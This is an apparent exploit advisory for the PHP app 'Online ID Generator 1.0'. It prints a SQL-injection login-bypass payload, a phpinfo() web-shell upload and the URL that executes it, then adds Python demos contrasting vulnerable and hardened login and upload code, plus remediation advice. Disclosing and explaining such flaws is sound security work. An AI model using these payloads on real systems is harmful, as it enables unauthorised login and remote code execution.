
Online ID Generator 1.0 - Remote Code Execution (RCE)

Posted by: HackApt-37 Team (黑客倉庫站長)
## Title: Online ID Generator 1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 08/31/2023
## Vendor:
## Software: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/id_generator_0.zip
## Reference: https://portswigger.net/web-security/sql-injection
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-securit...code-execution-ececution-via-web-shell-upload
## Status: High-critical vulnerability
[+] Login bypass SQLi:
## In the login form, as the username:

```mysql
nu11secur1ty' or 1=1#
```

The single quote closes the username literal, `or 1=1` makes the WHERE clause true for every row, and `#` starts a MySQL line comment that discards the rest of the query, including the password check, so the login succeeds without a valid password.
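To show what the payload above does to the login query, and what the fix looks like, here is an added example (not code from the advisory or from the Online ID Generator project). It builds a throwaway users table in SQLite so it runs offline; the accounts and passwords are constructed demo data, and because SQLite has no `#` comment the SQLite variant of the payload ends in `-- ` instead, which is the same trick in that dialect.

```python
import sqlite3

# Constructed demo data; not the target application's schema or accounts.
# Plain-text passwords are kept only to keep the example short.
SEED_USERS = [
    (1, "admin", "S3cr3t!"),
    (2, "nu11secur1ty", "hunter2"),
]

# The advisory's payload uses '#', MySQL's line comment. SQLite (used here so
# the example runs offline) has no '#' comment, so the equivalent '-- ' is used.
PAYLOAD_MYSQL = "nu11secur1ty' or 1=1#"
PAYLOAD_SQLITE = "nu11secur1ty' or 1=1-- "


def new_db():
    """In-memory users table standing in for the application's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_USERS)
    return conn


def build_vulnerable_query(username, password):
    """Query assembled by string concatenation: the pattern the bypass relies on."""
    return (
        "SELECT id, username FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )


def vulnerable_login(conn, username, password):
    """Returns the first matching (id, username) row, or None.

    With the injected username the comment swallows the password check and
    'or 1=1' matches every row, so the first user in the table (here the
    admin) is returned no matter what password was supplied."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone()


def safe_login(conn, username, password):
    """Parameterised query: the payload is compared literally as a username
    and matches nothing."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    db = new_db()
    print(build_vulnerable_query(PAYLOAD_SQLITE, ""))
    print("vulnerable login:", vulnerable_login(db, PAYLOAD_SQLITE, ""))
    print("safe login:      ", safe_login(db, PAYLOAD_SQLITE, ""))
```

Note which account the bypass lands on: `or 1=1` returns every row and the application takes the first one, so the attacker is typically logged in as the first user created, usually the administrator, not as the name typed before the quote.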
[+] Shell upload exploit:
## Upload as the system logo:

```php
<?php
// phpinfo() is a harmless proof that server-side PHP executes; any PHP body would run.
phpinfo();
?>
```
[+] RCE exploit
## Request the uploaded file from a remote browser:

```
http://localhost/id_generator/uploads/1693471560_info.php
```

As the file name shows, the upload was stored under its original name prefixed with a Unix timestamp (1693471560) in a web-reachable uploads directory, so requesting it executes the uploaded PHP and returns the phpinfo() page.
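The two steps above (upload as logo, then request the file) work because the upload handler keeps the client's file name and extension and drops the file into a directory the web server executes scripts from. The following added example (not code from the advisory or from the project) contrasts a store routine with that behaviour against a hardened one. The naming rule in `vulnerable_store` is inferred from the `1693471560_info.php` name on the page, `UPLOAD_DIR` is assumed, and the web shell and PNG header bytes are constructed inputs.

```python
import secrets
import time

# Web-reachable upload directory; assumed, matching the path in the RCE URL above.
UPLOAD_DIR = "uploads"

# Constructed sample uploads: the advisory's phpinfo() web shell, and a minimal PNG header.
PHP_SHELL = b"<?php\nphpinfo();\n?>\n"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

# Extensions acceptable for a logo, each with the magic bytes the content must start with.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def _basename(filename):
    """Strip any client-supplied directory part (both separator styles)."""
    return filename.replace("\\", "/").rsplit("/", 1)[-1]


def vulnerable_store(filename, content, now=None):
    """Behaviour inferred from the '1693471560_info.php' name on the page: the
    client's name is kept, prefixed with a Unix timestamp, and neither the
    extension nor the content is checked, so 'info.php' lands in the web root
    as an executable script. (content is accepted unread.)"""
    ts = int(time.time() if now is None else now)
    return f"{UPLOAD_DIR}/{ts}_{_basename(filename)}"


def hardened_store(filename, content):
    """Returns (stored_path, None) on success or (None, reason) on rejection.

    Allowlist the extension, require the content to carry matching image magic
    bytes, and never reuse the client's name, so no attacker-chosen extension
    (including 'shell.php.png'-style double extensions) reaches the server."""
    base = _basename(filename)
    dot = base.rfind(".")
    ext = base[dot:].lower() if dot >= 0 else ""
    if ext not in ALLOWED_TYPES:
        return None, f"extension {ext or '(none)'} not allowed"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return None, "content does not match declared image type"
    stored = secrets.token_hex(16) + ext  # random name; original name is discarded
    return f"{UPLOAD_DIR}/{stored}", None


if __name__ == "__main__":
    print("vulnerable:", vulnerable_store("info.php", PHP_SHELL, now=1693471560))
    print("hardened, php:", hardened_store("info.php", PHP_SHELL))
    print("hardened, php as png:", hardened_store("logo.png", PHP_SHELL))
    print("hardened, real png:", hardened_store("logo.png", PNG_STUB))
```

The extension allowlist plus magic-byte check stops this particular upload, but the upload directory should still not be executable: store files outside the web root (or serve them through a script that sets a fixed image Content-Type), and disable script execution in the upload location at the web server level so that a future bypass yields a download rather than code execution.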
## Reproduce:
[HREF](https://github.com/nu11secur1ty/cve.../oretnom23/2023/2023/online-id-generator-1.0)
## Proof and Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)
## Time spent:
00:10:00